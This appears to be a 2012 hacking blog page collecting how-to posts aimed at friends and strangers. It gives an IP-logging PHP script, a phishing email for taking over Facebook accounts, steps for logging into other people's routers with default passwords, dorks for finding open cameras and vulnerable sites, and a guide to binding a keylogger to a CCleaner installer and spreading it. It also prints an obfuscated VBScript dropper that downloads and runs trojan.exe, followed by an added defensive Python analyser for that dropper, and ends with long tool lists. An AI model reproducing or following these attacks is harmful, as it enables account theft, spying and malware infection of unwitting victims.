Showing posts with label hacking. Show all posts

Wednesday, 15 August 2012

Hack your friend's mobile


So you want to do any of the following?

    * log into your friend's mobile
    * read his messages
    * change his phone settings
    * change profile
    * play his ringtone even if the phone is on silent
    * play his songs (the ones on his phone)
    * restart the phone
    * switch off the phone
    * restore factory settings
    * change ringing volume
    * call from his phone


Ok, so how the hell do you do this? Ok, for starters, this is no hack. It uses Bluetooth's existing functionality to access the features listed above.


Prerequisites:

    * The other phone must be Bluetooth enabled (most are these days).
    * The other phone must have Bluetooth on. (Surprisingly, a lot of people always have it on, even though you should never leave it on: it eats your battery. A BBC Panorama programme some time back used this to find out that more than 60% of people have left Bluetooth on.)
    * Unless the other person configured it otherwise, you do require permission to pair once. So you need to have paired with the other phone once to use this hack next time without anyone knowing. (That's why it's "hack your friend's mobile": your friend might have paired with you already.)

Usage:

    * On Series 60, install directly.
    * If you have a phone like a Series 40 (Nokia 6230) with Bluetooth and Java 2 support, make a .jad file with the jad generator (included in the package).
    * When connecting the devices, use the code 0000.
    * Before starting the application on a smartphone, do not forget to turn on Bluetooth.

download Here


IP stealer


1. Create a PHP file from this code.

Code:
<?php
// Appends "<p parameter>: <client IP>" to IPz.txt for every request that carries ?p=
$file = 'IPz.txt';
$handle = fopen($file, 'a');
if (!isset($_GET['p'])) {
    // No parameter: redirect away and stop, so nothing is logged
    header('Location: http://google.com');
    exit;
}
// Double quotes are needed so \r\n is written as a line break, not as literal characters
fwrite($handle, $_GET['p'] . ': ' . $_SERVER['REMOTE_ADDR'] . "\r\n");
fclose($handle);
?>

2. Create an empty text file named IPz.txt alongside it.

3. Upload both to a free web hosting account.

4. Then send the link to the target.

5. Bingo!


See Hidden Facebook Pictures


Follow these steps:

1. Go to the profile page of the person.
2. Clear your address bar.
3. Paste this into it:


Code:
javascript:(function(){CSS.removeClass(document.body,%20'profile_two_columns');tab_controller.changePage("photos");})()



4. Now you can easily see pictures of somebody you don't even know.

How To Bypass Surveys For Free?


We often come across sites that force us to complete a survey before we can download a file or see some content. In all of these surveys we are forced to disclose personal information such as our phone number, email address, etc.
Later these sites pester you with SMS spam and mails full of offers you are not at all interested in!
So I've found a way to get through these sites without leaking your personal information!

Let's start -


1. Download the Firefox add-on called Greasemonkey (Firefox is required).

https://addons.mozilla.org/en-US/firefox/addon/greasemonkey/




2. After installing it, download this script, which runs with the help of the add-on (Greasemonkey):

http://userscripts.org/scripts/show/2560

Install this script and make sure the monkey on the right side of your Firefox window is coloured (which means Greasemonkey is active; to activate or deactivate it, just click on it).

3. Now go to the site that tells you to do the survey and asks for your information etc.

4. You'll see an option on the top left side of the page which says ''Press CTRL+SHIFT+F to fill in form.''



Do as directed: press CTRL+SHIFT+F and you will see that the form gets filled in on its own, and all the information filled in is completely random!

Click on submit and you are registered on the site, and now you can easily download what you wanted!

This is all random stuff filled by the script.


BUT

5. Some sites may tell you to verify your identity by logging into your mail and opening some URL or getting some PIN! For this, all you have to do is go to http://www.yopmail.com/en/ . There you'll get a temporary email address for around 15-30 min. Paste that temporary email address in place of the email address that your intelligent form filler randomly filled in, then click on submit form.


Here ''yoyo@yopmail.com'' is the yopmail email address, used in place of the default address given by ''form filler''.





6. Check the http://www.yopmail.com/en/ inbox for the mail from the site, get the PIN or confirmation link, and you are done!

Here, as you can see, there are two mails from the site where we had to register, with the confirmation link plus password (the other mails are just spam; ignore them).

OR

7. Some sites may ask you for voice-call confirmation. I have the solution for that too:
in that case go to http://www.k7.net/ . On this site you can receive voice calls via mail! So you bypass the survey again without giving any details!

Register there and you'll be able to receive voice calls via mail.

Hack Facebook Accounts Within 15 Mins. Enjoy! Possible


Hey guys. In this tutorial you will learn how to hack a Facebook account by tricking your friend. Go to any site that allows you to send anonymous emails and from there write an email like this:

Dear (Victims name),

This is to inform you that we are going to deactivate your account in 15 days because you have not followed our terms and rules while using your Facebook account. We found that your Facebook account is not following our rule 5.A.1 which is listed in our Content Guidelines.

To reactivate your account, please change your password to 12345678. Please keep up your password as 3d8Aj4Fn for at least a week so that we can verify your ownership.

Thank you.

Google hack tricks you've never seen before 1


Ok, today I will show a Google hack demonstration you've never seen
before.
You will never find these Google hack codes on the internet.
Just watch and learn what I have discovered!!!

Ok, it's time to show the secrets.

And these are the best Google hack codes.

I can make and combine any text and build Google dorks from JavaScript,
from HTML, CSS, jQuery, MooTools and so on really fast, and find
anything on this fucking lol g**gle !!!

I bet you will not understand what the hell I'm doing.

Just sit down, drink some coffee and watch.

This is just a demonstration.

OK, first I will show how to find any hacker forum or site, it doesn't matter which!
I mean professional hackers!

Just read it all, because if you don't you will not understand these
codes and how they work!

Dorks:

inurl:"view.asp?page=" intext:"plymouth"

Ok, what does this code do?
These are the university school sites you can hack with this dork.

inurl:"shoutbox.php" intext:"script"

With this code you can hack shoutboxes or find scripts.


inurl:"index.php?act=" rapidleech

This code will find Rapidleech sites very quickly.

inurl:"index.php?act=idx"

This code will quickly find IPB forums to hack.

inurl:"Photoshop.aspx" "tutorials"

This code will find Photoshop tutorials.

inurl: http://ftp://ftp site:.com

This code will find any FTP servers and root any protected sites.

allinurl:user_index.jsp

This code will find any free hosting.

powered by vbulletin games 3.8.4 inurl:member.php?u=1

This code will find any vBulletin game forums and their admin page.

powered by vbulletin 4.0.3 Debug Information

This code will show all vBulletin forums' PHP code and information,
and their bugs, so you can root into them.

powered by vbulletin "warez"

This code will find any warez forum.

video to mp3 converter online intext:"mp3"-intext:"High Quality"

With this code you can download mp3s from YouTube very quickly.

intext:"Warning: mysql_fetch_array()"

With this code you will find any vulnerable sites and hack them.

inurl:radioandtv.php

This code will show all torrents' hidden radio stations.

inurl:"posting.php?mode=s milies" "phpbb"

With this code you will be able to hack phpBB forums and put XSS inside the forum.

allinurl:tools/spider-view.php

With this code you can find site links very quickly.

embed src=".mp3" type=audio/mpeg

HTML injection code to find secret sites with HTML mp3 embed code;
you will see it even on Google.

"powered by vbulletin" + "account dumps"

With this code you will be able to find passwords
for any sites or forums, not for porn.

allinurl:"guestbook/smileys.php"
inurl:"smileys.php" + "talking"
allinurl:smiliehelp.php

Talking smilies.

"intitle:index of" admin/FCKeditor/_samples/html

With this code you will be able to find FCK server HTML
editors and hack them.

owl city fireflies + "instrumental"

With this code you will be able to find any mp3 instrumental; just change
"owl city fireflies".

HTTP/1.1 :: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3)
access_log

With this code you will be able to hack sites' access
logs and see all the information.

"sql google scanner" + "php"

Google SQL injection online: hack vulnerable sites and forums
and find vulnerable sites very easily.

site:youtube.com *@gmail.com

This will find any YouTube or any site emails.

allinurl:html_colors.html

This will find HTML colour chart codes very quickly.

private torrent + "open sign up"

This will find any private torrent site open to registration.


hotfile + mediafire + "http://" + "rar" horror 2010 dvdrip,
(hotfile|mediafire).rar 2010 horror dvdrip

This will find any secret sites with DVDrip movies; just change "horror".

dvdrip 400mb "2010"

This will find ripped DVDrip movies in 400MB, and the latest ones.

sql injection dork bank

This will find bank dorks for Google hacking.

inurl:archive/index.php "visual basic"

This will find secret forum directories where you will see all the information.

Hack Your Broadband (No Risk)


Step 1: Download any port scanner (I prefer SuperScan or IPScanner).

Step 2: First get your IP from
CODE  www.whatismyip.com
Assume your IP is 59.x.x.17.

Step 3: Copy your IP into the IPScanner software and scan for alive IPs in the range below:
start: 59.x.x.1 to end: 59.x.x.255


Step 4: Then check in your scanner which alive IPs have port 80 open.

Step 5: Enter such an alive IP in your web browser.

Step 6: It asks for a username and password.
Type:
User=admin
Password=admin or password
This is the default password for most routers.

If denied, then try another alive IP.

Step 7: If successful, it will show the router settings page of that IP's user.
There, go to Home -> WAN Setting and the username and password of his account will appear there.

Step 8: Use ShowPassword or Revelation software to view the password hidden behind the asterisks.

Now you have the username/password.
Enjoy!

How to Hack into a Live Security Camera


Well, this is an interesting article. It is a sub-section of a hacking technique known as “Google Hacking”. What we are looking at are unsecured cams from around the world that are interfaced with the internet. So how do you find such cameras? Just google the following strings and select any result. Whoa, you can see a live cam on your PC screen!! The strings are given below:



inurl:”CgiStart?page=”
inurl:/view.shtml
intitle:”Live View / – AXIS
inurl:view/view.shtml
inurl:ViewerFrame?Mode=
inurl:ViewerFrame?Mode=Refresh
inurl:axis-cgi/jpg
inurl:axis-cgi/mjpg (motion-JPEG) (disconnected)
inurl:view/indexFrame.shtml
inurl:view/index.shtml
inurl:view/view.shtml
liveapplet
intitle:”live view” intitle:axis
intitle:liveapplet
allintitle:”Network Camera NetworkCamera” (disconnected)
intitle:axis intitle:”video server”
intitle:liveapplet inurl:LvAppl
intitle:”EvoCam” inurl:”webcam.html”
intitle:”Live NetSnap Cam-Server feed”
intitle:”Live View / – AXIS”
intitle:”Live View / – AXIS 206M”
intitle:”Live View / – AXIS 206W”
intitle:”Live View / – AXIS 210?
inurl:indexFrame.shtml Axis
inurl:”MultiCameraFrame?Mode=Motion” (disconnected)
intitle:start inurl:cgistart
intitle:”WJ-NT104 Main Page”
intitle:snc-z20 inurl:home/
intitle:snc-cs3 inurl:home/
intitle:snc-rz30 inurl:home/
intitle:”sony network camera snc-p1?
intitle:”sony network camera snc-m1?
site:.viewnetcam.com -www.viewnetcam.com
intitle:”Toshiba Network Camera” user login
intitle:”netcam live image” (disconnected)
intitle:”i-Catcher Console – Web Monitor”
Happy Cam Hacking Guys!!

Hack Facebook Password Remotely


Hacking a Facebook account is very easy and requires no more than 10 minutes of work. Don't worry, I will also tell you how to protect your Facebook account or passwords from such hacks and hackers. But for this you must know how hackers hack your Facebook account. So first I teach you how to hack a Facebook account remotely, and then I will tell you how to protect yourself from this.

So guys, let's start hacking Facebook accounts or passwords....

Steps to hack a Facebook account using a keylogger:
1. Creating the keylogger server to hack Facebook passwords.
2. Extracting the icon from an installer.
3. Binding the keylogger server with any software setup.
4. How to spread your keylogger or send it to your friends to hack their Facebook accounts or passwords.


Step 1. Creating the Keylogger Server
1. Download the keylogger.


2. Extract the file. Now you will get two folders:
a. The first one contains the keylogger and binder.
b. The second contains the Resource Hacker tool (to extract the icons from installers).

3. Now open the keylogger. It contains two fields, one for the Gmail email and the other for the password. For this, create one test account on Gmail and enter its details here.



4. After entering the email and password, set the time interval, usually 3 mins, i.e. after how much time you want to receive logs from the user.
5. Now click on send verification mail. This mail is to test whether your keylogger is working correctly or not.
6. After you click this you will receive a confirmation mail on the test account which will confirm that the keylogger is working.
7. Now click on generate to set the mutex (any secret key to make your keylogger FUD) and then click on compile server.
8. Now save the file to the desktop or any other location of your choice. Now your server is ready, but it can be easily detected.


Step 2: Extracting the icon file from any installer (Resource Hacker)
1. Open the Resource Hacker folder and open the reshacker file.
2. Now go to its menu and open any setup file. Suppose we want to attach our keylogger to the CCleaner setup file. So open the CCleaner setup with Resource Hacker.
3. Now in the menu there is one action button; click on it and then click save all resources.
4. Now save all the resources to the desktop or any other location of your choice.
5. It consists of two files, one is the icon file and the other is a res file. We only need the icon file, so you can delete the other file, i.e. the res file.
6. Now we have the icon of the installer file (as discussed above, the CCleaner setup icon).


Step 3: Bind the keylogger server with any software
1. Now go to the keylogger folder and open the Binder.
2. Now click on the + button given below to add files.
3. Now add the keylogger server and the setup of the software (i.e. in our case it's the CCleaner setup).
4. Now in the menu of the Binder, go to Settings. There select the icon that we extracted in the previous step and set the location of the output file as shown in the figure.
5. Now again go to the File menu in the Binder and click on Bind files.
6. Now your bound keylogger is ready. Now you have to spread it or send it to the slave, that is, your friend.


Step 4: How to spread the keylogger or send it to the slave or friend
1. Now you have one software setup file with the keylogger attached to it (in our case we have the CCleaner setup with the keylogger attached to it).
2. Now spread your keylogger through forums. You might be a member of various forums; use them to spread your keylogger in the form of software posts. You can use various software that users frequently download to spread it.
3. Spread it through pendrives or USB hard drives. Suppose a friend asked you for some software; give him the software that has the keylogger attached to it.
Note: you can also attach the keylogger to images. But that can be detected by antivirus. So avoid that type of hacking.
So isn't it easy to hack anyone's Facebook account in just a few minutes?

How to protect yourself from these hacks?
Prevention is always better than cure, so always follow these steps:
1. Don't use cracked software and don't download software from unauthorized websites.
2. Always keep your antivirus and anti-spyware up to date.
3. Always scan files before transferring them to your USB drive.
4. Do not allow other users to use your PC, i.e. password-protect it.

Trojan Through HTML

You must all have heard that someone got infected with a trojan by visiting some website.

In this tutorial I am going to help you understand how that is done!!!

Look at this HTML code




<HTML>
<BODY>
<script language="VBScript">
on error resume next
dl = "www.abc.com/trojan.exe"
Set df = document.createElement("object")
cls1="clsid:BD96"
cls2="C556-65A"
cls3="3-11D0-9"
cls4="83A-00C04FC29E36"
clsfull=cls1&cls2&cls3&cls4
df.setAttribute "classid",clsfull
strr1="Mic"
strr2="roso"
strr3="ft."
strr4="XML"
strr5="HTTP"
strr=strr1&strr2&strr3&strr4&strr5
Set x = df.CreateObject(strr,"")
ab1="A"
ab2="dod"
ab3="b.S"
ab4="t"
ab5="re"
ab6="am"
strb1=ab1&ab2&ab3&ab4&ab5&ab6
strb5=strb1
set YY = df.createobject(strb5,"")
YY.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fnamezz1="update.exe"
scripp1="Scrip"
scripp2="ting"
scripp3=".Fil"
scripp4="eSyste"
scripp5="mObject"
scripp=scripp1&scripp2&scripp3&scripp4&scripp5
set FF = df.createobject(scripp,"")
set tmp = F.GetSpecialFolder(2)
fnamezz1= FF.BuildPath(tmp,fnamezz1)
YY.open
YY.write x.responseBody
YY.savetofile fnamezz1,2
YY.close
set MM = df.createobject("Shell.Application","")
MM.ShellExecute fnamezz1,"","","open",0
</script>
</BODY>
</HTML>
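What a defender can do with a sample like this, as an added example that is not part of the original post: the script above hides the COM objects it needs (an XMLHTTP downloader, ADODB.Stream, FileSystemObject, Shell.Application) by splitting their names into fragments joined with &. The Python checker below resolves that string-concatenation obfuscation statically and reports which download/write/execute capabilities the page requests and how many fragments each name was built from. The input is a constructed reduction of the sample (download URL replaced by a placeholder) and the indicator tables are my own, not from the post.

```python
import re
from typing import Dict, List, Optional, Tuple

# Indicator tables (added here, not from the original post). Together these ProgIDs let a page
# script download, write and execute a file; the CLSID is the one the sample assembles from
# four fragments (the control commonly identified as RDS.DataSpace).
SUSPICIOUS_PROGIDS = {
    "microsoft.xmlhttp": "HTTP download",
    "adodb.stream": "binary file write",
    "scripting.filesystemobject": "file-system access (temp path)",
    "shell.application": "process execution via ShellExecute",
}
SUSPICIOUS_CLSIDS = {"bd96c556-65a3-11d0-983a-00c04fc29e36": "ActiveX factory for the objects above"}

ASSIGN_RE = re.compile(r"^\s*(?:set\s+)?([A-Za-z_]\w*)\s*=\s*(.+?)\s*$", re.IGNORECASE)
TOKEN_RE = re.compile(r'"([^"]*)"|([A-Za-z_]\w*)|(&)|(\S)')
STRING_RE = re.compile(r'"([^"]*)"')

# Constructed sample: the page's dropper reduced to its string-building statements, with the
# download URL replaced by a placeholder.
SAMPLE = r'''
dl = "www.example.invalid/trojan.exe"
cls1="clsid:BD96"
cls2="C556-65A"
cls3="3-11D0-9"
cls4="83A-00C04FC29E36"
clsfull=cls1&cls2&cls3&cls4
df.setAttribute "classid",clsfull
strr1="Mic"
strr2="roso"
strr3="ft."
strr4="XML"
strr5="HTTP"
strr=strr1&strr2&strr3&strr4&strr5
Set x = df.CreateObject(strr,"")
ab1="A"
ab2="dod"
ab3="b.S"
ab4="t"
ab5="re"
ab6="am"
strb1=ab1&ab2&ab3&ab4&ab5&ab6
strb5=strb1
set YY = df.createobject(strb5,"")
set MM = df.createobject("Shell.Application","")
'''

def eval_concat(expr: str, values: Dict[str, Tuple[str, int]]) -> Optional[Tuple[str, int]]:
    """Evaluate an expression made only of string literals, known string variables and '&'.
    Returns (resolved string, number of literal fragments it was built from), or None when the
    expression contains anything else (a method call, a number, an unknown name)."""
    out: List[str] = []
    fragments, expect_operand = 0, True
    for m in TOKEN_RE.finditer(expr):
        kind = m.lastindex  # 1 literal, 2 identifier, 3 '&', 4 anything else
        if kind == 4 or (kind == 3) == expect_operand:
            return None  # stray character, or operand/operator out of order
        if kind == 3:
            expect_operand = True
            continue
        if kind == 1:
            out.append(m.group(1))
            fragments += 1
        else:
            ref = values.get(m.group(2).lower())
            if ref is None:
                return None
            out.append(ref[0])
            fragments += ref[1]
        expect_operand = False
    return None if expect_operand else ("".join(out), fragments)

def resolve_strings(script: str) -> Dict[str, Tuple[str, int]]:
    """Walk the script top to bottom, resolving every assignment that is pure string concatenation."""
    values: Dict[str, Tuple[str, int]] = {}
    for line in script.splitlines():
        m = ASSIGN_RE.match(line)
        if m:
            resolved = eval_concat(m.group(2), values)
            if resolved is not None:
                values[m.group(1).lower()] = resolved
    return values

def scan_vbscript(script: str) -> List[Tuple[str, str, int]]:
    """Return (value, capability, fragment count) for each suspicious ProgID or CLSID the script
    uses, whether written directly (1 fragment) or assembled from pieces (more than 1)."""
    candidates: Dict[str, int] = {lit: 1 for lit in STRING_RE.findall(script)}
    for value, fragments in resolve_strings(script).values():
        candidates[value] = max(fragments, candidates.get(value, 0))
    findings = []
    for value, fragments in candidates.items():
        key = value.lower()
        if key in SUSPICIOUS_PROGIDS:
            findings.append((value, SUSPICIOUS_PROGIDS[key], fragments))
        elif key.startswith("clsid:") and key[6:] in SUSPICIOUS_CLSIDS:
            findings.append((value, SUSPICIOUS_CLSIDS[key[6:]], fragments))
    return sorted(findings)

if __name__ == "__main__":
    for value, capability, fragments in scan_vbscript(SAMPLE):
        print(f"{value:45} {capability:40} built from {fragments} fragment(s)")
```

A fragment count above 1 for a well-known ProgID is itself a strong signal: legitimate pages have no reason to spell "Microsoft.XMLHTTP" in five pieces.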

Monday, 16 July 2012

SITE FOR TOOLS

Top 10 Password Crackers


http://www.oxid.it/cain.html
http://www.openwall.com/john/
http://freeworld.thc.org/thc-hydra/
http://www.aircrack-ng.org/
http://www.l0phtcrack.com/
http://airsnort.shmoo.com/
http://www.solarwinds.com/
http://www.foofus.net/fizzgig/pwdump/
http://project-rainbowcrack.com/
http://www.hoobie.net/brutus/

Top Packet Sniffers


http://www.wireshark.org/
http://www.kismetwireless.net/
http://www.tcpdump.org/
http://ettercap.sourceforge.net/
http://www.monkey.org/~dugsong/dsniff/
http://www.stumbler.net/
http://www.ntop.org/
http://etherape.sourceforge.net/
http://kismac.de/

Top Scanners


http://www.cirt.net/nikto2
http://www.parosproxy.org/index.shtml
http://www.wiretrip.net/rfp/
http://portswigger.net/suite/
http://www.acunetix.com/
http://www.nstalker.com/products
http://www.nessus.org/nessus/
http://www.gfi.com/lannetscan/
http://www.eeye.com/...cts/Retina.aspx
http://www-arc.com/sara/
http://www.qualys.com/

LIST OF HACKING TOOLS

o Sensepost Footprint Tools
o Big Brother
o BiLE Suite
o Alchemy Network Tool
o Advanced Administrative Tool
o My IP Suite
o Wikto Footprinting Tool
o Whois Lookup
o Whois
o SmartWhois
o ActiveWhois
o LanWhois
o CountryWhois
o WhereIsIP
o Ip2country
o CallerIP
o Web Data Extractor Tool
o Online Whois Tools
o What is MyIP
o DNS Enumerator
o SpiderFoot
o Nslookup
o Extract DNS Information
• Types of DNS Records
• Necrosoft Advanced DIG
o Expired Domains
o DomainKing
o Domain Name Analyzer
o DomainInspect
o MSR Strider URL Tracer
o Mozzle Domain Name Pro
o Domain Research Tool (DRT)
o Domain Status Reporter
o Reggie
o Locate the Network Range
• ARIN
• Traceroute
• 3D Traceroute
• NeoTrace
• VisualRoute Trace
• Path Analyzer Pro
• Maltego
• Layer Four Traceroute
• Prefix WhoIs widget
• Touchgraph
• VisualRoute Mail Tracker
• eMailTrackerPro
o 1st E-mail Address Spider
o Power E-mail Collector Tool
o GEOSpider
o Geowhere Footprinting Tool
o Google Earth
o Kartoo Search Engine
o Dogpile (Meta Search Engine)
o Tool: WebFerret
o robots.txt
o WTR - Web The Ripper
o Website Watcher
SCANNING

• Angry IP
• HPing2
• Ping Sweep
• Firewalk Tool
• Firewalk Commands
• Firewalk Output
• Nmap
• Nmap: Scan Methods
• NMAP Scan Options
• NMAP Output Format
• TCP Communication Flags
• Three Way Handshake
o Syn Stealth/Half Open Scan
o Stealth Scan
o Xmas Scan
o Fin Scan
o Null Scan
o Idle Scan
o ICMP Echo Scanning/List Scan
o TCP Connect/Full Open Scan
o FTP Bounce Scan
• Ftp Bounce Attack
o SYN/FIN Scanning Using IP Fragments
o UDP Scanning
o Reverse Ident Scanning
o RPC Scan
o Window Scan
o Blaster Scan
o Portscan Plus, Strobe
o IPSec Scan
o Netscan Tools Pro
o WUPS – UDP Scanner
o Superscan
o IPScanner
o Global Network Inventory Scanner
o Net Tools Suite Pack
o Atelier Web Ports Traffic Analyzer (AWPTA)
o Atelier Web Security Port Scanner (AWSPS)
o IPEye
o ike-scan
o Infiltrator Network Security Scanner
o YAPS: Yet Another Port Scanner
o Advanced Port Scanner
o NetworkActiv Scanner
o NetGadgets
o P-Ping Tools
o MegaPing
o LanSpy
o HoverIP
o LANView
o NetBruteScanner
o SolarWinds Engineer’s Toolset
o AUTAPF
o OstroSoft Internet Tools
o Advanced IP Scanner
o Active Network Monitor
o Advanced Serial Data Logger
o Advanced Serial Port Monitor
o WotWeb
o Antiy Ports
o Port Detective

Enumeration


Overview of System Hacking Cycle
Techniques for Enumeration
NetBIOS Null Sessions
o So What’s the Big Deal
o DumpSec Tool
o NetBIOS Enumeration Using Netview
• Nbtstat Enumeration Tool
• SuperScan
• Enum Tool
o Enumerating User Accounts
• GetAcct
o Null Session Countermeasure
PS Tools
o PsExec
o PsFile
o PsGetSid
o PsKill
o PsInfo
o PsList
o PsLogged On
o PsLogList
o PsPasswd
o PsService
o PsShutdown
o PsSuspend
o Management Information Base (MIB)
o SNMPutil Example
o SolarWinds
o SNScan
o Getif SNMP MIB Browser
o UNIX Enumeration
o SNMP UNIX Enumeration
o SNMP Enumeration Countermeasures
o LDAP enumeration
o JXplorer
o LdapMiner
o Softerra LDAP Browser
o NTP enumeration
o SMTP enumeration
o Smtpscan
o Web enumeration
o Asnumber
o Lynx
o Windows Active Directory Attack Tool
o How To Enumerate Web Application Directories in IIS Using DirectoryServices

IP Tools Scanner
Enumerate Systems Using Default Password
Tools:
o NBTScan
o NetViewX
o FREENETENUMERATOR
o Terminal Service Agent
o TXNDS
o Unicornscan
o Amap
o Netenum

System Hacking


Part 1- Cracking Password
o Password Types
o Types of Password Attack
• Passive Online Attack: Wire Sniffing
• Passive Online Attack: Man-in-the-middle and replay attacks
• Active Online Attack: Password Guessing
• Offline Attacks
Brute force Attack
Pre-computed Hashes
Syllable Attack/Rule-based Attack/ Hybrid attacks
Distributed network Attack
Rainbow Attack
• Non-Technical Attacks
o PDF Password Cracker
o Abcom PDF Password Cracker
o Password Mitigation
o Permanent Account Lockout-Employee Privilege Abuse
o Administrator Password Guessing
• Manual Password cracking Algorithm
• Automatic Password Cracking Algorithm
o Performing Automated Password Guessing
• Tool: NAT
• Smbbf (SMB Passive Brute Force Tool)
• SmbCrack Tool: Legion
• Hacking Tool: L0phtcrack
o Microsoft Authentication
• LM, NTLMv1, and NTLMv2
• NTLM And LM Authentication On The Wire
• Kerberos Authentication
• What is LAN Manager Hash?
LM “Hash” Generation
LM Hash
• Salting
• PWdump2 and Pwdump3
• Tool: Rainbowcrack
• Hacking Tool: KerbCrack
• Hacking Tool: NBTDeputy
• NetBIOS DoS Attack
• Hacking Tool: John the Ripper
o Password Sniffing
o How to Sniff SMB Credentials?
o SMB Replay Attacks
o Replay Attack Tool: SMBProxy
o SMB Signing
o Tool: LCP
o Tool: SID&User
o Tool: Ophcrack 2
o Tool: Crack
o Tool: Access PassView
o Tool: Asterisk Logger
o Tool: CHAOS Generator
o Tool: Asterisk Key
o Password Recovery Tool: MS Access Database Password Decoder
o Password Cracking Countermeasures
o Do Not Store LAN Manager Hash in SAM Database
o LM Hash Backward Compatibility
o How to Disable LM HASH
o Password Brute-Force Estimate Tool
o Syskey Utility
o AccountAudit
Part2-Escalating Privileges
o Privilege Escalation
o Cracking NT/2000 passwords
o Active@ Password Changer
• Change Recovery Console Password - Method 1
• Change Recovery Console Password - Method 2
o Privilege Escalation Tool: x.exe
Part3-Executing applications
o Tool: psexec
o Tool: remoexec
o Ras N Map
o Tool: Alchemy Remote Executor
o Emsa FlexInfo Pro
o Keystroke Loggers
o E-mail Keylogger
o Revealer Keylogger Pro
o Handy Keylogger
o Ardamax Keylogger
o Powered Keylogger
o Quick Keylogger
o Spy-Keylogger
o Perfect Keylogger
o Invisible Keylogger
o Actual Spy
o SpyToctor FTP Keylogger
o IKS Software Keylogger
o Ghost Keylogger
o Hacking Tool: Hardware Key Logger
o What is Spyware?
o Spyware: Spector
o Remote Spy
o Spy Tech Spy Agent
o 007 Spy Software
o Spy Buddy
o Ace Spy
o Keystroke Spy
o Activity Monitor
o Hacking Tool: eBlaster
o Stealth Voice Recorder
o Stealth Keylogger
o Stealth Website Logger
o Digi Watcher Video Surveillance
o Desktop Spy Screen Capture Program
o Telephone Spy
o Print Monitor Spy Tool
o Stealth E-Mail Redirector
o Spy Software: Wiretap Professional
o Spy Software: FlexiSpy
o PC PhoneHome
o Keylogger Countermeasures
o Anti Keylogger


Trojans and Backdoors


Effect on Business
What is a Trojan?
o Overt and Covert Channels
o Working of Trojans
o Different Types of Trojans
Remote Access Trojans
Data-Sending Trojans
Destructive Trojans
Denial-of-Service (DoS) Attack Trojans
Proxy Trojans
FTP Trojans

Security Software Disablers
o What do Trojan Creators Look for?
o Different Ways a Trojan can Get into a System
Indications of a Trojan Attack
Ports Used by Trojans
o How to Determine which Ports are Listening
Trojans
o Trojan: iCmd
o MoSucker Trojan
o Proxy Server Trojan
o SARS Trojan Notification
o Wrappers
o Wrapper Covert Program
o Wrapping Tools
o One Exe Maker / YAB / Pretator Wrappers
o Packaging Tool: WordPad
o RemoteByMail
o Tool: Icon Plus
o Defacing Application: Restorator
o Tetris
o HTTP Trojans
o Trojan Attack through Http
o HTTP Trojan (HTTP RAT)
o Shttpd Trojan - HTTP Server
o Reverse Connecting Trojans
o Nuclear RAT Trojan (Reverse Connecting)
o Tool: BadLuck Destructive Trojan
o ICMP Tunneling
o ICMP Backdoor Trojan
o Microsoft Network Hacked by QAZ Trojan
o Backdoor.Theef (AVP)
o T2W (TrojanToWorm)
o Biorante RAT
o DownTroj
o Turkojan
o Trojan.Satellite-RAT
o Yakoza
o DarkLabel B4
o Trojan.Hav-Rat
o Poison Ivy
o Rapid Hacker
o SharK
o HackerzRat
o TYO
o 1337 Fun Trojan
o Criminal Rat Beta
o VicSpy
o Optix PRO
o ProAgent
o OD Client
o AceRat
o Mhacker-PS
o RubyRAT Public
o SINner
o ConsoleDevil
o ZombieRat
o FTP Trojan - TinyFTPD
o VNC Trojan
o Webcam Trojan
o DJI RAT
o Skiddie Rat
o Biohazard RAT
o Troya
o ProRat
o Dark Girl
o DaCryptic
o Net-Devil
Classic Trojans Found in the Wild
o Trojan: Tini
o Trojan: NetBus

o Trojan: Netcat
o Netcat Client/Server
o Netcat Commands
o Trojan: Beast
o Trojan: Phatbot
o Trojan: Amitis
o Trojan: Senna Spy
o Trojan: QAZ
o Trojan: Back Orifice
o Trojan: Back Orifice 2000
o Back Orifice Plug-ins
o Trojan: SubSeven
o Trojan: CyberSpy Telnet Trojan
o Trojan: Subroot Telnet Trojan
o Trojan: Let Me Rule! 2.0 BETA 9
o Trojan: Donald Dick
o Trojan: RECUB
Hacking Tool: Loki
Loki Countermeasures
Atelier Web Remote Commander

Trojan Horse Construction Kit
How to Detect Trojans?
o Netstat
o fPort
o TCPView
Viruses and Worms


   Virus History
   Characteristics of Virus
   Working of Virus
o Infection Phase
o Attack Phase
   Why people create Computer Viruses
   Symptoms of a Virus-like Attack
   Virus Hoaxes
   Chain Letters
   How is a Worm Different from a Virus
   Indications of a Virus Attack
   Hardware Threats
   Software Threats
   Virus Damage
   Mode of Virus Infection
   Stages of Virus Life
   Virus Classification
   How Does a Virus Infect?
   Storage Patterns of Virus
o System Sector virus
o Stealth Virus
o Bootable CD-Rom Virus
• Self-Modification
• Encryption with a Variable Key
o Polymorphic Code
o Metamorphic Virus
o Cavity Virus
o Sparse Infector Virus
o Companion Virus
o File Extension Virus
   Famous Virus/Worms – I Love You Virus
   Famous Virus/Worms – Melissa
   Famous Virus/Worms – JS/Spth
   Klez Virus Analysis
   Latest Viruses
   Top 10 Viruses- 2008
o Virus: Win32.AutoRun.ah
o Virus:W32/Virut
o Virus:W32/Divvi
o Worm.SymbOS.Lasco.a
o Disk Killer
o Bad Boy
o HappyBox
o Java.StrangeBrew
o MonteCarlo Family
o PHP.Neworld
o W32/WBoy.a
o ExeBug.d
o W32/Voterai.worm.e
o W32/Lecivio.worm
o W32/Lurka.a
o W32/Vora.worm!p2p
   Writing a Simple Virus Program
   Virus Construction Kits
   Virus Detection Methods
   Virus Incident Response
   What is Sheep Dip?
   Virus Analysis – IDA Pro Tool
   Prevention is better than Cure
   Anti-Virus Software
o AVG Antivirus
o Norton Antivirus
o McAfee
o SocketShield
o BitDefender
o ESET Nod32
o CA Anti-Virus
o F-Secure Anti-Virus
o Kaspersky Anti-Virus
o F-Prot Antivirus
o Panda Antivirus Platinum
o avast! Virus Cleaner
o ClamWin
o Norman Virus Control
Popular Anti-Virus Packages
Virus Databases

Sniffers


Definition - Sniffing
Protocols Vulnerable to Sniffing
Tool: Network View – Scans the Network for Devices
The Dude Sniffer
Wireshark
Display Filters in Wireshark
Following the TCP Stream in Wireshark
Cain and Abel
Tcpdump
Tcpdump Commands
Types of Sniffing
o Passive Sniffing
o Active Sniffing
What is ARP
o ARP Spoofing Attack
o How does ARP Spoofing Work
o ARP Poisoning
o MAC Duplicating
o MAC Duplicating Attack
o Tools for ARP Spoofing
• Ettercap
• ArpSpyX
o MAC Flooding
• Tools for MAC Flooding
Linux Tool: Macof
